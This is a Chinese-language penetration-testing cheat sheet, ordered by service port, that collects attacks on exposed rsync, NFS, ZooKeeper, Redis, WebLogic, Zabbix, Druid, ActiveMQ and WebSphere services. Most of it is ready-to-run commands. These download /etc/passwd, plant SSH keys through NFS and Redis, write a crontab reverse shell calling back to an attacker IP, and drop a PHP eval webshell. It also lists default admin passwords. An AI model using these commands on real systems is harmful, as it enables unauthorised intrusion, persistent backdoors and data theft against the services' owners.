873 rsync 未授權訪問:
rsync IP:: //這是在默認條件下沒有改變默認的端口,默認密碼是::
rsync --port=xxx ip:: //如果修改了默認端口就需要指定端口,這里就是需要自己指定47900端口
rsync -avz ip::www /tmp //-avz是下載文件的命令,前一個是目標內容,后一個是自己指定存儲在本地的路徑
rsync -avz --port=xxx ip::dddd /tmp
rsync --port=xxx ip::
rsync ip::
rsync rsync://ip:873
#獲取到目錄之后,只需在路徑后添加目錄名即可查看目錄中的文件。
rsync ip::src
rsync rsync://ip/src
#下載任意文件
rsync rsync://192.168.122.1/src/etc/passwd ./
rsync 192.168.122.1::src/etc/passwd ./
#上傳任意文件
rsync x.txt rsync://192.168.122.1/src/home/
rsync x.txt 192.168.122.1::src/home/
2049 nfs 未授權:
showmount -e ip
#查看nfs掛載
showmount -e server_ip
#客戶端掛載,掛載到本地的/tmp/test路徑
mount -t nfs server_ip:/var /tmp/test
#卸載共享目錄
umount /tmp/
#配置ssh永久連接
mount -t nfs server_ip:/ /tmp/test
ssh-keygen
cat ~/.ssh/id_rsa.pub >> /tmp/test/root/.ssh/autorized_keys ssh
root@server_ip
2181 zookeeper 未授權:
#輸出服務器的詳細信息。
echo envi | nc xx.xx.xx.xx 2181
#輸出相關服務配置的詳細信息,端口、數據路徑、日志路徑、session 超時時間,最大連接數等。
echo conf | nc xx.xx.xx.xx 2181
#列出所有連接到當前服務器的客戶端/會話的詳細信息。
echo cons | nc xx.xx.xx.xx 2181 | more
#輸出未處理的會話和臨時節點,leader 節點有效。
echo dump | nc xx.xx.xx.xx 2181 | more
#如在kali下,可以用如下命令安裝zookeeper工具,之后即可使用客戶端連接工具zkCli.sh。
apt-get install zookeeper
#使用-server參數指定目標即可連接。
./zkCli.sh -server xx.xx.xx.xx:2181
3389 rdp 爆破 CVE-2019-0708
5900 vnc 爆破
6379 redis 未授權:
#默認redis使用的6379端口,使用nmap查看端口情況
nmap -A -p 6379 --script redis-info ip
#未授權連接
redis-cli -h ip [-p port]
#可以看到Redis的版本和服務器上內核版本信息,如果是新版的Redis2.8以后的版本還可以看到Redis配置文件的絕對路徑
info
#可以查看里面的key和其對應的值
keys *
get key
#漏洞利用
1.利用crontab反彈shell
>>直接向靶機的Crontab寫入任務計划,反彈shell回來
redis 192.168.242.134:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.242.131/888 0>&1\n"
redis 192.168.242.134:6379> config set dir /var/spool/cron/
redis 192.168.242.134:6379> config set dbfilename root
redis 192.168.242.134:6379> save
>>然后在攻擊機(192.168.242.131)上啟動 nc 監聽 888端口,等待反彈shell。這過程需要一些時間。
[root@localhost ~]# nc -lvnp 888
2.寫入webshell
當自己的redis權限不高時,可以向web里
寫入webshell,但需要對方有web服務且有寫入權限。假設靶機里面存在WEB服務並且目錄在 /var/www/
redis 192.168.242.134:6379>config set dir /var/www/a
redis 192.168.242.134:6379>config set xxx "\n\n\n<?php @eval($_POST['c']);?>\n\n\n"
redis 192.168.242.134:6379>config set dbfilename webshell.php
redis 192.168.242.134:6379>save
寫入之后訪問目錄看是否存在,如果已經寫入,可以使用菜刀連入數據庫了。
3.寫ssh-keygen公鑰然后使用私鑰登陸
>>利用條件:
(1)redis對外開放,且是未授權訪問狀態
(2)redis服務ssh對外開放,可以通過key登入
>>具體利用步驟:
1) 准備好自己的公鑰,寫入本地文件text.txt。
[root@localhost src]#ssh-keygen -t rsa # 創建秘鑰
[root@localhost src]#(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt
2) 通過redis將該文件寫入內存
[root@localhost src]# ./redis-cli -h 192.168.242.134 flushall
[root@localhost src]# cat test.txt | redis-cli -h 192.168.242.134 -x set crackit #鏈接redis 並將秘鑰上傳
3) 利用redis-cli 寫入配置的方式將公鑰寫入到.ssh目錄下
[root@localhost src]# redis-cli -h 192.168.242.134
192.168.242.134:6379> config set dir /root/.ssh/# 切到ssh目錄去
192.168.242.134:6379> config get dir
192.168.242.134:6379> config set dbfilename "authorized_keys"# 保存到 authorized_keys 文件里
192.168.242.134:6379> save ssh -i id_rsa root@192.168.242.134# 保存並登陸
7001 weblogic:
#利用exp
https://github.com/rabbitmask/WeblogicScan
#控制台弱口令
后台登錄地址:http://ip:7001/console
默認用戶名密碼:weblogic/weblogic
#控制台文件上傳getshell
https://www.cnblogs.com/bmjoker/p/9822886.html
8009 tomcat CVE-2020-1938 幽靈貓
#xray檢測命令
xray_windows_amd64.exe servicescan --target ip:8009
8069 zabbix 弱口令+命令執行
http://ip:8069/zabbix
zabbix常用弱口令 admin/zabbix 或 guest/空口令
#反彈shell(https://blog.csdn.net/Adminxe/article/details/105926971)
利用口令登陸以后開始反彈shell
管理—腳本,在命令寫入反彈shell命令,在VPS開始nc監聽
監測->問題,隨便打開個主機找到剛剛創建的腳本,就可以執行反彈shell命令
8086 druid未授權(通過泄露的Session登錄后台)
/druid/websession.html
/system/druid/websession.html
/webpage/system/druid/websession.html
8161 Apache ActiveMQ 遠程代碼執行漏洞 (CVE-2016-3088)
https://paper.seebug.org/346/
https://www.cnblogs.com/xyongsec/p/11459542.html
https://blog.csdn.net/weixin_42936566/article/details/87004649
9090 websphere控制台
Websphere8.5登錄頁面:https://localhost:9043/ibm/console/logon.jsp
Websphere6-7默認控制台地址也是:http://localhost:9043/ibm/console
弱口令:admin/空密碼